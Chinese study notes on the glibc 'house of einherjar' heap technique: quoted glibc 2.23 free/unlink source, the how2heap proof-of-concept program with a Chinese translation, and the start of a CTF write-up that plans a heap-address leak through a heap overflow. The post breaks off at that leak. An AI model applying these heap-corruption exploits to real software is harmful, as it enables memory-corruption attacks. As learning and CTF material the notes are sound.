14号差不多了解了house of spirit的堆利用方法，现在就来学习house-of-einherjar的堆利用。
在学习house of einherjar 之前，要先学习unlink的这个堆漏洞的利用，这样会对unlink的流程以及free()的过程会更加清晰。
house of einherjar的这个堆利用适用范围``2.23—— 至今`

前置知识

之前学习了unlink技术，有一段时间没有做unlink的相关题型，所以先简单的总结一下unlink的过程，以及堆的前向合并以及后向和合并。并且重点强调堆中的隐式链表技术（该技术在house of spirit中有稍微提过一点）
这里继续放出free()和unlink的源码，接下来要看源码，理清一下free()的流程，这样有助于更好的学习house of spirit这个堆利用方式

free函数流程

通过略读free函数，大概理清了free函数的具体流程

堆管理隐式链表技术

堆块在被释放的时候如果被放入了bins中他是会被链表这个结构给管理起来的。
而我们在按顺序申请堆块的时候，每个堆块都有在物理地址上相邻的堆块。对于每个堆块如果找到物理地址上相邻的其他两个堆块，这就是堆管理的隐式链表技术。
我们就用如下示例程序对堆管理的隐式链表技术进行一个比较详细的说明。

#include<stdio.h>
#include<stdlib.h>
int main()
{
        unsigned long long int* p;
        malloc(0x30);
        p = malloc(0x150);
        malloc(0x50);
        free(p);
        return 0;
}
# gcc -o test test.c

我们直接对编译好的test程序进行动态调试。使用ni命令将该程序执行到调用完free之后，执行ret指令之前。这时我们使用vis命令查看一下堆块会看到如下结果。图中红色框的都是每个堆块的prev_size位和size位。所谓隐式链表，也就是该堆块并没有指针去指向下一个chunk。而是使用自己的prev_size和size从而去确定低地址的堆块的位置，和高地址堆块的位置。
- 在图中对于绿色区域，它的prev_size=0x160，而它的size=0x60
- 所以我们就可以通过绿色这个堆块的起始地址p = 0x107c1a0通过p-p.prev_size=0x107c040从而计算出与该堆块的物理地址相邻且更低的堆块的起始地址。
- 要计算与该堆块的物理地址相邻且更高的堆块的起始地址，就可以通过p=0x107c1a0,p+(p.size>>3)<<3=0x107c200得到
- 注意prev_size这个数据，只有在该堆块prev_inuse这个位为0的时候会有效，当prev_inuse为1的时候prev_size是无效的，不会起作用。

free函数相关源码

__libc_free源码

__libc_free

glibc2.23--malloc.c第2933行开始

void
__libc_free (void *mem)
{
  mstate ar_ptr;
  mchunkptr p;                          /* chunk corresponding to mem */

  void (*hook) (void *, const void *)
    = atomic_forced_read (__free_hook);
  if (__builtin_expect (hook != NULL, 0))
    {
      (*hook)(mem, RETURN_ADDRESS (0));
      return;
    }

  if (mem == 0)                              /* free(0) has no effect */
    return;

  p = mem2chunk (mem);

  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
    {
      /* see if the dynamic brk/mmap threshold needs adjusting */
      if (!mp_.no_dyn_threshold
          && p->size > mp_.mmap_threshold
          && p->size <= DEFAULT_MMAP_THRESHOLD_MAX)
        {
          mp_.mmap_threshold = chunksize (p);
          mp_.trim_threshold = 2 * mp_.mmap_threshold;
          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
                      mp_.mmap_threshold, mp_.trim_threshold);
        }
      munmap_chunk (p);
      return;
    }

  ar_ptr = arena_for_chunk (p);
  _int_free (ar_ptr, p, 0);
}
libc_hidden_def (__libc_free)

_int_free源码

glibc2.23--malloc.c第3836行开始

/*
   ------------------------------ free ------------------------------
 */

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */
  mchunkptr nextchunk;         /* next contiguous chunk */
  INTERNAL_SIZE_T nextsize;    /* its size */
  int nextinuse;               /* true if nextchunk is used */
  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
  mchunkptr bck;               /* misc temp for linking */
  mchunkptr fwd;               /* misc temp for linking */

  const char *errstr = NULL;
  int locked = 0;

  size = chunksize (p);

  /* Little security check which won't hurt performance: the
     allocator never wrapps around at the end of the address space.
     Therefore we can exclude some size values which might appear
     here by accident or by "design" from some intruder.  */
  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
      || __builtin_expect (misaligned_chunk (p), 0))
    {
      errstr = "free(): invalid pointer";
    errout:
      if (!have_lock && locked)
        (void) mutex_unlock (&av->mutex);
      malloc_printerr (check_action, errstr, chunk2mem (p), av);
      return;
    }
  /* We know that each chunk is at least MINSIZE bytes in size or a
     multiple of MALLOC_ALIGNMENT.  */
  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    {
      errstr = "free(): invalid size";
      goto errout;
    }

  check_inuse_chunk(av, p);

  /*
    If eligible, place chunk on a fastbin so it can be found
    and used quickly in malloc.
  */

  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())

#if TRIM_FASTBINS
      /*
	If TRIM_FASTBINS set, don't place chunks
	bordering top into fastbins
      */
      && (chunk_at_offset(p, size) != av->top)
#endif
      ) {

    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
			     >= av->system_mem, 0))
      {
	/* We might not have a lock at this point and concurrent modifications
	   of system_mem might have let to a false positive.  Redo the test
	   after getting the lock.  */
	if (have_lock
	    || ({ assert (locked == 0);
		  mutex_lock(&av->mutex);
		  locked = 1;
		  chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
	      }))
	  {
	    errstr = "free(): invalid next size (fast)";
	    goto errout;
	  }
	if (! have_lock)
	  {
	    (void)mutex_unlock(&av->mutex);
	    locked = 0;
	  }
      }

    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);

    set_fastchunks(av);
    unsigned int idx = fastbin_index(size);
    fb = &fastbin (av, idx);

    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
    mchunkptr old = *fb, old2;
    unsigned int old_idx = ~0u;
    do
      {
	/* Check that the top of the bin is not the record we are going to add
	   (i.e., double free).  */
	if (__builtin_expect (old == p, 0))
	  {
	    errstr = "double free or corruption (fasttop)";
	    goto errout;
	  }
	/* Check that size of fastbin chunk at the top is the same as
	   size of the chunk that we are adding.  We can dereference OLD
	   only if we have the lock, otherwise it might have already been
	   deallocated.  See use of OLD_IDX below for the actual check.  */
	if (have_lock && old != NULL)
	  old_idx = fastbin_index(chunksize(old));
	p->fd = old2 = old;
      }
    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);

    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
      {
	errstr = "invalid fastbin entry (free)";
	goto errout;
      }
  }

  /*
    Consolidate other non-mmapped chunks as they arrive.
  */

  else if (!chunk_is_mmapped(p)) {
    if (! have_lock) {
      (void)mutex_lock(&av->mutex);
      locked = 1;
    }

    nextchunk = chunk_at_offset(p, size);

    /* Lightweight tests: check whether the block is already the
       top block.  */
    if (__glibc_unlikely (p == av->top))
      {
	errstr = "double free or corruption (top)";
	goto errout;
      }
    /* Or whether the next chunk is beyond the boundaries of the arena.  */
    if (__builtin_expect (contiguous (av)
			  && (char *) nextchunk
			  >= ((char *) av->top + chunksize(av->top)), 0))
      {
	errstr = "double free or corruption (out)";
	goto errout;
      }
    /* Or whether the block is actually not marked used.  */
    if (__glibc_unlikely (!prev_inuse(nextchunk)))
      {
	errstr = "double free or corruption (!prev)";
	goto errout;
      }

    nextsize = chunksize(nextchunk);
    if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
	|| __builtin_expect (nextsize >= av->system_mem, 0))
      {
	errstr = "free(): invalid next size (normal)";
	goto errout;
      }

    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);

    /* consolidate backward */
    if (!prev_inuse(p)) {
      prevsize = p->prev_size;
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      unlink(av, p, bck, fwd);
    }

    if (nextchunk != av->top) {
      /* get and clear inuse bit */
      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

      /* consolidate forward */
      if (!nextinuse) {
	unlink(av, nextchunk, bck, fwd);
	size += nextsize;
      } else
	clear_inuse_bit_at_offset(nextchunk, 0);

      /*
	Place the chunk in unsorted chunk list. Chunks are
	not placed into regular bins until after they have
	been given one chance to be used in malloc.
      */

      bck = unsorted_chunks(av);
      fwd = bck->fd;
      if (__glibc_unlikely (fwd->bk != bck))
	{
	  errstr = "free(): corrupted unsorted chunks";
	  goto errout;
	}
      p->fd = fwd;
      p->bk = bck;
      if (!in_smallbin_range(size))
	{
	  p->fd_nextsize = NULL;
	  p->bk_nextsize = NULL;
	}
      bck->fd = p;
      fwd->bk = p;

      set_head(p, size | PREV_INUSE);
      set_foot(p, size);

      check_free_chunk(av, p);
    }

    /*
      If the chunk borders the current high end of memory,
      consolidate into top
    */

    else {
      size += nextsize;
      set_head(p, size | PREV_INUSE);
      av->top = p;
      check_chunk(av, p);
    }

    /*
      If freeing a large space, consolidate possibly-surrounding
      chunks. Then, if the total unused topmost memory exceeds trim
      threshold, ask malloc_trim to reduce top.

      Unless max_fast is 0, we don't know if there are fastbins
      bordering top, so we cannot tell for sure whether threshold
      has been reached unless fastbins are consolidated.  But we
      don't want to consolidate on each free.  As a compromise,
      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
      is reached.
    */

    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
      if (have_fastchunks(av))
	malloc_consolidate(av);

      if (av == &main_arena) {
#ifndef MORECORE_CANNOT_TRIM
	if ((unsigned long)(chunksize(av->top)) >=
	    (unsigned long)(mp_.trim_threshold))
	  systrim(mp_.top_pad, av);
#endif
      } else {
	/* Always try heap_trim(), even if the top chunk is not
	   large, because the corresponding heap might go away.  */
	heap_info *heap = heap_for_ptr(top(av));

	assert(heap->ar_ptr == av);
	heap_trim(heap, mp_.top_pad);
      }
    }

    if (! have_lock) {
      assert (locked);
      (void)mutex_unlock(&av->mutex);
    }
  }
  /*
    If the chunk was allocated via mmap, release via munmap().
  */

  else {
    munmap_chunk (p);
  }
}

unlink源码

unlink宏定义

glibc2.23--malloc.c第1413行开始

#define unlink(AV, P, BK, FD) {                                            \
    FD = P->fd;								      \
    BK = P->bk;								      \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
    else {								      \
        FD->bk = BK;							      \
        BK->fd = FD;							      \
        if (!in_smallbin_range (P->size)				      \
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
	      malloc_printerr (check_action,				      \
			       "corrupted double-linked list (not small)",    \
			       P, AV);					      \
            if (FD->fd_nextsize == NULL) {				      \
                if (P->fd_nextsize == P)				      \
                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
                else {							      \
                    FD->fd_nextsize = P->fd_nextsize;			      \
                    FD->bk_nextsize = P->bk_nextsize;			      \
                    P->fd_nextsize->bk_nextsize = FD;			      \
                    P->bk_nextsize->fd_nextsize = FD;			      \
                  }							      \
              } else {							      \
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
              }								      \
          }								      \
      }									      \
}

其他源码

glibc2.23--malloc.c第1303行获取size的值

1	#define chunksize(p) ((p)->size & ~(SIZE_BITS))

glibc2.23--malloc.c第1219行，用于将free(addr)这个addr回退到chunk的头部而不是chunk中size之后的地址。

1	#define mem2chunk(mem) ((mchunkptr)((char)(mem) - 2SIZE_SZ))

利用方式

前向合并和后向合并

之前对于源码中的注释consolidate backward和consolidate forward到底哪个是前向合并哪个是后向合并有点搞不清楚。
这里先对自己对堆块的认知做一个统一，按照注释中的意识，我们将地址增加的方向当做前，地址减少的方向当做后。
所以之前在unlink中所写的可能有点相反了。

了解了堆管理隐式链表技术和之前学习的unlink，就可以来学习house of einherjar的漏洞利用方式了。与该利用方式相关的代码是unlink和_int_free中的代码前向合并和后向合并的部分代码。unlink的代码上面有，这边主要是截取_int_free的部分代码。
- 这边注释所说的consolidate backward就是我们释放的堆块与其后面的堆块合并，叫做后向合并
- 这边注释所说的consolidate forward 就是我们释放的堆块与其前面的堆块合并，叫做前向合并
- 由于后向合并会更新p指针，使其指向低地址的堆块。所以在unlink时，p指针都是指向两个要合并堆块中低地址的那一块。
- house of einherjar主要用到的是堆块的后向合并（正常堆块为前、伪造的堆块在后或者能溢出修改p位的堆块在前、伪造的堆块在后）

   /* consolidate backward */
   if (!prev_inuse(p)) {
     prevsize = p->prev_size;
     size += prevsize;
     p = chunk_at_offset(p, -((long) prevsize));
     unlink(av, p, bck, fwd);
   }

   if (nextchunk != av->top) {
     /* get and clear inuse bit */
     nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

     /* consolidate forward */
     if (!nextinuse) {
	unlink(av, nextchunk, bck, fwd);
	size += nextsize;
     } else
clear_inuse_bit_at_offset(nextchunk, 0);

利用原理

接下来就详细说明一下house of einherjar具体的利用过程。house of einherjar是利用unlink的过程和堆管理隐式链表技术的不安全进行漏洞利用的。
- 在堆块中，两个物理相邻的chunk会共享prev_size字段，尤其是当低地址的chunk处于使用状态的时（此时高地址的堆中prev_inuse位为1）高地址的chunk的prev_size字段可以被低地址的chunk使用。因此，我们有希望可以通过写低地址的chunk覆盖高地址chunk的prev_size字段。
- 一个chunk的prev_inuse位标记了其物理地址相邻的低地址chunk的使用状态，而且该位是和prev_size物理相邻。
- 后向合并时，p指针会被更新，更新到两个合并堆块中所处地址更小的一个堆块。即p = chunk_at_offset(p, -((long) prevsize));
首先我们的利用过程如下（这边我给出两种利用方式）其中一种方式是博客普遍上有的，另一种应该可以（刚学没遇到）。
利用方式：这边我们先申请了两个堆块（实际上要三个，防止与top_chunk相邻的堆块与top_chunk合并），将其命名为chunk0和chunk_1，他们的物理地址的结构如图所示。（图中一些数据可能要重新布置，图中size为0x40可能无法利用house of einherjar，具体设置细节看实验或者利用原理的最后）

我们先伪造一个fake_chunk，fake_chunk的具体要求伪造要求之后再说。

我们对chunk0进行写操作，此时需要off-by-one漏洞，这样我们将chunk0的数据溢出到chunk1中，并且修改了chunk1中prev_size的值和也修改chunk1中p位的值为0。其中prev_size的值应该为chunk1_addr - fake_chunk_addr（二者要么都用prev_size的地址相减，要么都用fd指针所存储的地址相减）。

这时我们将chunk1释放，就会触发后向合并。我们就会更新p指针为p = chunk_at_offset(p, -((long))，此时p就指向了fake_chunk。这时合并后就会出现这么一大块的空间。并且合并后的堆块会被放入unsorted_bin中被管理

之后我们再使用malloc申请一个堆块，这个堆块这个堆块就会从fake_chunk开始，切割一部分然后返回给用户使用。这样我们就达到了任意地址写的目的。
注意：由于要计算prev_size的大小，所以需要泄露堆地址和fake_chunk的地址。
在这个过程中我们需要修改的数据如下：（可以先看实验之后再来看这边）
- 我们要通过溢出修改高地址堆块的prev_size为该堆地址到fake_chunk的偏移地址
- 我们还要修改更高地址堆块的P位为0，如果该堆块的size不是0x100整数倍的话，还需要修改该堆块的size位使得其是0x100的整数倍，并且要确保M和M位为0。（其实也可以修改size位为0x00）

我们fake_chunk的所需要伪造的地方：
- prev_size位：如果能伪造就尽量伪造成我们所要unlink的另一个堆块的size大小（即上面溢出的堆块的size）。(貌似glibc2.23,对prev_size位检查没那么高)经过测试fake_chunk的prev_size位不需要伪造
- 对于P位：一定要置0，这样才能触发unlink，对于M和N位需要保持0即可
- 对于size位：一定要和b堆块的prev_size相同大小（这样才能绕过检查机制）
- 对于fd、bk、fd_nextsize、bk_nextsize都指向fake_chunk的开头，至少要满足fd、bk指向fake_chunk的开头这样才能绕过unlink的检查机制。当申请的堆块比较大时就会多出两个元数据，即fd_nextsize、bk_nextsize。这样我们对于fd、bk、fd_nextsize、bk_nextsize赋值相同的值，就可以绕过unlink的检查。

实验

这时how2heap上glibc2.23的house of einherjar.c的源码

源码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
   Credit to st4g3r for publishing this technique
   The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc()
   This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak. 
*/

int main()
{
	setbuf(stdin, NULL);
	setbuf(stdout, NULL);

	printf("Welcome to House of Einherjar!\n");
	printf("Tested in Ubuntu 16.04 64bit.\n");
	printf("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

	uint8_t* a;
	uint8_t* b;
	uint8_t* d;

	printf("\nWe allocate 0x38 bytes for 'a'\n");
	a = (uint8_t*) malloc(0x38);
	printf("a: %p\n", a);
	
	int real_a_size = malloc_usable_size(a);
	printf("Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);

	// create a fake chunk
	printf("\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
	printf("However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
	printf("We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
	printf("(although we could do the unsafe unlink technique here in some scenarios)\n");

	size_t fake_chunk[6];

	fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
	fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
	fake_chunk[2] = (size_t) fake_chunk; // fwd
	fake_chunk[3] = (size_t) fake_chunk; // bck
	fake_chunk[4] = (size_t) fake_chunk; //fwd_nextsize
	fake_chunk[5] = (size_t) fake_chunk; //bck_nextsize


	printf("Our fake chunk at %p looks like:\n", fake_chunk);
	printf("prev_size (not used): %#lx\n", fake_chunk[0]);
	printf("size: %#lx\n", fake_chunk[1]);
	printf("fwd: %#lx\n", fake_chunk[2]);
	printf("bck: %#lx\n", fake_chunk[3]);
	printf("fwd_nextsize: %#lx\n", fake_chunk[4]);
	printf("bck_nextsize: %#lx\n", fake_chunk[5]);

	/* In this case it is easier if the chunk size attribute has a least significant byte with
	 * a value of 0x00. The least significant byte of this will be 0x00, because the size of 
	 * the chunk includes the amount requested plus some amount required for the metadata. */
	b = (uint8_t*) malloc(0xf8);
	int real_b_size = malloc_usable_size(b);

	printf("\nWe allocate 0xf8 bytes for 'b'.\n");
	printf("b: %p\n", b);

	uint64_t* b_size_ptr = (uint64_t*)(b - 8);
	/* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/

	printf("\nb.size: %#lx\n", *b_size_ptr);
	printf("b.size is: (0x100) | prev_inuse = 0x101\n");
	printf("We overflow 'a' with a single null byte into the metadata of 'b'\n");
	a[real_a_size] = 0; 
	printf("b.size: %#lx\n", *b_size_ptr);
	printf("This is easiest if b.size is a multiple of 0x100 so you "
		   "don't change the size of b, only its prev_inuse bit\n");
	printf("If it had been modified, we would need a fake chunk inside "
		   "b where it will try to consolidate the next chunk\n");

	// Write a fake prev_size to the end of a
	printf("\nWe write a fake prev_size to the last %lu bytes of a so that "
		   "it will consolidate with our fake chunk\n", sizeof(size_t));
	size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
	printf("Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
	*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;

	//Change the fake chunk's size to reflect b's new prev_size
	printf("\nModify fake chunk's size to reflect b's new prev_size\n");
	fake_chunk[1] = fake_size;

	// free b and it will consolidate with our fake chunk
	printf("Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
	free(b);
	printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

	//if we allocate another chunk before we free b we will need to 
	//do two things: 
	//1) We will need to adjust the size of our fake chunk so that
	//fake_chunk + fake_chunk's size points to an area we control
	//2) we will need to write the size of our fake chunk
	//at the location we control. 
	//After doing these two things, when unlink gets called, our fake chunk will
	//pass the size(P) == prev_size(next_chunk(P)) test. 
	//otherwise we need to make sure that our fake chunk is up against the
	//wilderness

	printf("\nNow we can call malloc() and it will begin in our fake chunk\n");
	d = malloc(0x200);
	printf("Next malloc(0x200) is at %p\n", d);
}

为了能认真让自己看一遍这个代码，我决定将汉化源码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
   Credit to st4g3r for publishing this technique(感谢的话语)
   House of Einherjar 使用0字节溢出进行off-by-one利用,从而控制malloc()函数返回的指针.
   这个利用方式与有问题的Null Byte相比,可能造成更强大的原语,但是它有一个额外的条件就是需要泄露堆.
*/

int main()
{
	setbuf(stdin, NULL);
	setbuf(stdout, NULL);

	printf("欢迎来到House of Einherjar!\n");
	printf("在Ubuntu 16.04 64bit中测试.\n");
	printf("当你有一个能用0字节进行off-by-one利用,溢出到一个被分配的堆块区域,就可以进行house of enherjar.\n");

	uint8_t* a;
	uint8_t* b;
	uint8_t* d;

	printf("\n我们分配0x38字节给a指针\n");
	a = (uint8_t*) malloc(0x38);
	printf("a: %p\n", a);
	
	int real_a_size = malloc_usable_size(a);
	printf("因为我们需要对堆块a进行溢出,所以我们需要a所指堆块在舍入后的真实大小: %#x\n", real_a_size);

	// create a fake chunk
	printf("\n我们在我们指定的地方创建一个fake chunk,在这个例子中,我们将在栈上创建一个chunk\n");
	printf("然而,你也能创建chunk在堆中或者bss段中,只要你知道你所创建堆块的地址就可以.\n");
	printf("我们设置fd指针和bk指针都指向fake_chunk,这样我们就可以绕过unlink的检查. \n");
	printf("(这里在一些情况中我们也可以使用unlink漏洞)\n");

	size_t fake_chunk[6];

	fake_chunk[0] = 0x100; // prev_size现在是被使用的,我们必须与fake_chunk的大小相同,这样才能绕过P->bk->size == P->prev_size这个语句的检查
	fake_chunk[1] = 0x100; // 这个chunk的size仅仅需要满足进入small bin的大小就行
	fake_chunk[2] = (size_t) fake_chunk; // fwd
	fake_chunk[3] = (size_t) fake_chunk; // bck
	fake_chunk[4] = (size_t) fake_chunk; //fwd_nextsize
	fake_chunk[5] = (size_t) fake_chunk; //bck_nextsize


	printf("我们伪造的堆块地址为:%p \n堆块中的伪造数据如下:\n", fake_chunk);
	printf("prev_size (not used): %#lx\n", fake_chunk[0]);
	printf("size: %#lx\n", fake_chunk[1]);
	printf("fwd: %#lx\n", fake_chunk[2]);
	printf("bck: %#lx\n", fake_chunk[3]);
	printf("fwd_nextsize: %#lx\n", fake_chunk[4]);
	printf("bck_nextsize: %#lx\n", fake_chunk[5]);

	/* 在这个例子中如果块大小具有最小的合法字节,那么将更容易.
	 * 数值:0x00. 这个最小的合法字节将是0x00,因为chunk的size包括申请的大小加上元数据所需的大小. */
	b = (uint8_t*) malloc(0xf8);
	int real_b_size = malloc_usable_size(b);

	printf("\n我们分配0xf8字节给'b'指针.\n");
	printf("b: %p\n", b);

	uint64_t* b_size_ptr = (uint64_t*)(b - 8);
	/*这个技术是通过覆盖已经一个已经分配的chunk的size位和pre_inuse bit位来实现的*/

	printf("\nb.size: %#lx\n", *b_size_ptr);
	printf("b.size is: (0x100) | prev_inuse = 0x101\n");
	printf("我们使用空字节溢出'a'堆块,使得该空字节写入到b堆块中的size位和pre_inuse bit位\n");
	a[real_a_size] = 0; 
	printf("b.size: %#lx\n", *b_size_ptr);
	printf("如果b.size是0x100的倍数,这时是最好利用的,此时我们不需要改变b的size,仅仅改变它的prev_inuse bit \n");
	printf("如果它已经被修改过了,我们需要在b中放一个fake_chunk,它将尝试与下一个chunk合并 \n");

	// 伪造fake prev_size,从而确定a堆块结束的位置
	printf("\n我们伪造一个fake prev_size在a的最后%lu bytes,这样它将和我们的fake_chunk合并 \n", sizeof(size_t));
	size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
	printf("我们的fake prev_size将是: %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
	*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;

	//改变fake chunk的size位,使得其与b的新prev_size位相对应
	printf("\n修改fake_chunk的size位从而反应b的新prev_size位\n");
	fake_chunk[1] = fake_size;

	// 释放b并且它将和我们的堆块合并
	printf("现在我们释放b并且b将和我们的fake chunk合并,因为b的prev_inuse没有被设置\n");
	free(b);
	printf("我们的fake chunk的size位现在为: %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

	//如果在我们释放b之前我们分配另一个chunk,将需要做两件事情
	//1) 我们将需要调整我们fake chunk的size,这样才能使得fake_chunk + fake_chunk的size 指向我们所能控制的地方.
	//2) 我们将需要在我们所控制的区域中写入的fake chunk的大小.
	//在做这两件事情后,当unlink被调用时,我们的fake chunk将绕过size(P)== prev_size(next_chunk(P))的检测
	//否则我们需要确保我们的对着无效区域

	printf("\n现在我们将调用malloc()并且它将从我们的fake chunk开始申请\n");
	d = malloc(0x200);
	printf("下一个malloc(0x200) is at %p\n", d);
}

接下来进行动态调试，我们先申请了一个0x38的堆块。

然后我们在栈上伪造了一个fake chunk,伪造的fake chunk数据如下

之后又申请了一个0xf8大小的堆块。

这时我们再通过off-by-one溢出，修改b的p位为0（其他俩位在申请时默认为0）

之后我们先泄露了b的地址和fake chunk的地址，并计算这两个的偏移，将计算的结果写入到b的prev_size位中，同时还需要改变fake chunk的size位（这样貌似是为了绕过检查）

此时我们再释放堆块b，在释放的过程中就发生了unlink使得堆块b和fake_chunk合并，结果就会变成如下这样。这时我们的堆就会被合并到栈上。（用heap或者heap -v命令再查看栈就会出现问题，查看到的堆块并不是我们下次分配要分割的堆块起始地址。下次要分割返回的起始地址其实在fake_chunk那边，看下一步malloc就清楚了）

然后我们再申请一个0x200大小的堆块。

house of einherjar_level_1

题目来源：CTFhub的house of einherjar，题目环境是glibc2.23，但是为了方便动态调试，我就使用ubuntu22.04，即glibc2.35版本，之后动态调试查看fd指针的时候才会使用glibc2.23的环境，因为高版本的glibc存储fd的指针的值为进行异或加密
这题在2月2号尝试打了一下，但是由于题打太少了，思维给实验的那种利用方式给限制了，这题并不是在bss段或者是栈上伪造堆块，而是构造堆叠，进行堆排布。（但是收获还是有的，弄好了docker环境中的gdb调试）
今天2月3号打算再来尝试一下这题（找了好半天看了wp之后才知道要用堆叠，并且这题还要用到malloc_hook，打完这题马上就学malloc_hook）
这题本地打一下就行，打远程还是有点问题

level_1_分析1

接下来检查一下程序的保护机制，发现保护开的很全，这时候就

接下来将该程序拖入IDA对该程序进行逆向分析，同时配合程序的运行，这样可以更好的理清程序的运行逻辑
先来查看一下main函数的大致逻辑
- 先是init对该程序进行输入输出初始化，让该程序无缓冲输入，但是标准输出好像不是无缓冲输出
- 接下来打印menu菜单，1.create、2.show、3delete、4.edit、5.exit
- 接下来就是让用户输入选项，输入选项之后就进入用户所选择选项的相应函数

接下来查看add()函数
- 先让用户输入ID，也就是申请堆块返回地址存储的索引
- 然后让用户输入size_long，也就是所要申请堆块的大小
- 经过判断后，满足条件就调用malloc()函数申请用户指定的堆块大小，并将返回的堆块地址存储到chunk数组中
- 之后将size_long存储在size中

现在来查看delete()函数
- 让用户输入book的ID
- 之后使用free()函数释放指定ID的堆块
- 之后还将存储释放堆块的地址置0所以不存在UAF漏洞

接下来就查看show函数
- 将用户指定的堆块内容输出到屏幕上，这边还存在着数组越界引用的漏洞。（这个数组越界引用的漏洞并没有什么用好像）
- 最多就是利用%s这个字符串格式化对堆块的地址进行泄露

接下来查看edit()这个函数
- 在这里先会读取上一次申请堆块的大小
- 之后我们选择要edit的堆块ID
- 之后就向我们指定的堆块中写入数据
- 注意由于我们读取的是上一次操作堆块的大小，所以与我们所指定的堆块大小无关，这就可能造成堆溢出的操作。（这个程序逻辑需要动态调试和认真读汇编代码才能理清楚代码逻辑）
- 假如我们在edit之前申请堆块ID为14，这时我们edit的size就是ID14的size。当我们在edit之前是释放ID为10的堆块，这时我们edit的size就是ID为10的堆块的size

我们在.bss段中发现了全局变量number，但是这个number在程序运行过程中没有被使用，这个全局变量就很可能是用来伪造堆块

level_1_分析2

现在进行gdb动态调试，这时候我们这边有一个堆溢出，这样我们可以通过堆风水对堆进行巧妙的排布，然后再通过堆溢出，最后使用edit()函数就可以泄露出堆地址。但是泄露完这个堆地址后并没有什么用，因为我们没办法对.bss段的地址或者栈上的地址，使用这种利用方式是行不通的。
那么我们就直接利用unlink机制，两个堆unlink后，堆块就会被放入unsorted_bin，由于unsorted_bin是双向链表，这样我们就可以利用这个链表指针，通过edit()函数将libc的地址泄露出来。接下来我们进行动态调试。这样我们就要先使用house_of_einherjar堆块伪造技术，对堆块进行堆叠。
由于后申请的堆块处于更高地址，最后申请的堆块与topchunk相邻，为了不让合并后的堆块与top_chunk合并，我们在申请我们所需要理由的堆块后最后还要申请一个堆块，用于阻隔合并后的堆块和top_chunk。（并且这个堆块要的size要比之前的大一点，这样我们才能够进行堆溢出操作。）
注意：house of einherjar利用的是堆块的后向合并，这时我们要修改低地址的堆块为空闲堆块，再free高地址的堆块所以这个堆块的prev_inuse位就需要为1。这时我们需要绕过unlink的检查机制

1 2	if (__builtin_expect (FD->bk != P \|\| BK->fd != P, 0)) \ malloc_printerr (check_action, "corrupted double-linked list", P, AV); \

这时我们就需要泄露chunk的地址，这时我们就要先泄露堆块的地址，我们先创建一个堆块ID6，大小为0x10用于堆溢出，然后我们再申请两个堆块ID7、ID8大小都为0x20，最后防止被释放的堆块合并top我们再申请一个堆块ID9大小为0x40

这时我们先释放ID8的堆块（后申请的堆块），再释放ID7的堆块（先申请的堆块）。这两个堆块就放入了fastbin中，堆块ID7的fd指针会指向堆块ID8的prev_size_addr。

这时我们就可以通过溢出ID6，溢出到ID7的fd指针，再使用show()函数，打印出ID6堆块内容的同时就会将ID7的fd指针打内容打印出来，这样我们就可以泄露ID8的prev_size_addr的地址从而就可以泄露堆块的地址

这样我们就可以进行堆块溢出

这样堆块的地址就可以被泄露出来了。
